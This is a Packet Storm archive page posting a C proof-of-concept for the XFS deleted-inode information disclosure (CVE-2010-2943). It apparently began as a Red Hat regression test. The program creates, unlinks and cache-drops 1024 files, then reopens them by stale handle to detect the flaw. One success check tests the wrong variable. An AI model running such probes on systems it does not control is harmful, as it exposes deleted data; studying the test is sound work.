Twenty Year Anniversary

XFS Deleted Inode Information Disclosure

XFS Deleted Inode Information Disclosure
Posted Sep 30, 2010
Authored by David Chinner

Local information disclosure exploit that makes use of an XFS filesystem vulnerability.

tags | exploit, local, info disclosure
advisories | CVE-2010-2943
MD5 | 761edc6224c0cf1326a2bc394b1c99d2

XFS Deleted Inode Information Disclosure

Change Mirror Download
*  stale_handle.c - attempt to create a stale handle and open it
*
* Copyright (C) 2010 Red Hat, Inc. All Rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* Credit: David Chinner
* The XFS filesystem is prone to a local information-disclosure vulnerability.
*
* Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. * Denial-of-service attacks may also be possible.
*/

#define TEST_UTIME

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <errno.h>
#include <xfs/xfs.h>
#include <xfs/handle.h>

#define NUMFILES 1024
int main(int argc, char **argv)
{
int i;
int fd;
int ret;
int failed = 0;
char fname[MAXPATHLEN];
char *test_dir;
void *handle[NUMFILES];
size_t hlen[NUMFILES];
char fshandle[256];
size_t fshlen;
struct stat st;


if (argc != 2) {
fprintf(stderr, "usage: stale_handle test_dir\n");
return EXIT_FAILURE;
}

test_dir = argv[1];
if (stat(test_dir, &st) != 0) {
perror("stat");
return EXIT_FAILURE;
}

ret = path_to_fshandle(test_dir, (void **)fshandle, &fshlen);
if (ret < 0) {
perror("path_to_fshandle");
return EXIT_FAILURE;
}

/*
* create a large number of files to force allocation of new inode
* chunks on disk.
*/
for (i=0; i < NUMFILES; i++) {
sprintf(fname, "%s/file%06d", test_dir, i);
fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0644);
if (fd < 0) {
printf("Warning (%s,%d), open(%s) failed.\n", __FILE__,
__LINE__, fname);
perror(fname);
return EXIT_FAILURE;
}
close(fd);
}

/* sync to get the new inodes to hit the disk */
sync();

/* create the handles */
for (i=0; i < NUMFILES; i++) {
sprintf(fname, "%s/file%06d", test_dir, i);
ret = path_to_handle(fname, &handle[i], &hlen[i]);
if (ret < 0) {
perror("path_to_handle");
return EXIT_FAILURE;
}
}

/* unlink the files */
for (i=0; i < NUMFILES; i++) {
sprintf(fname, "%s/file%06d", test_dir, i);
ret = unlink(fname);
if (ret < 0) {
perror("unlink");
return EXIT_FAILURE;
}
}

/* sync to get log forced for unlink transactions to hit the disk */
sync();

/* sync once more FTW */
sync();

/*
* now drop the caches so that unlinked inodes are reclaimed and
* buftarg page cache is emptied so that the inode cluster has to be
* fetched from disk again for the open_by_handle() call.
*/
system("echo 3 > /proc/sys/vm/drop_caches");

/*
* now try to open the files by the stored handles. Expecting ENOENT
* for all of them.
*/
for (i=0; i < NUMFILES; i++) {
errno = 0;
fd = open_by_handle(handle[i], hlen[i], O_RDWR);
if (fd < 0 && errno == ENOENT) {
free_handle(handle[i], hlen[i]);
continue;
}
if (ret >= 0) {
printf("open_by_handle(%d) opened an unlinked file!\n",
i);
close(fd);
} else
printf("open_by_handle(%d) returned %d incorrectly on
an unlinked file!\n", i, errno);
free_handle(handle[i], hlen[i]);
failed++;
}
if (failed)
return EXIT_FAILURE;
return EXIT_SUCCESS;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close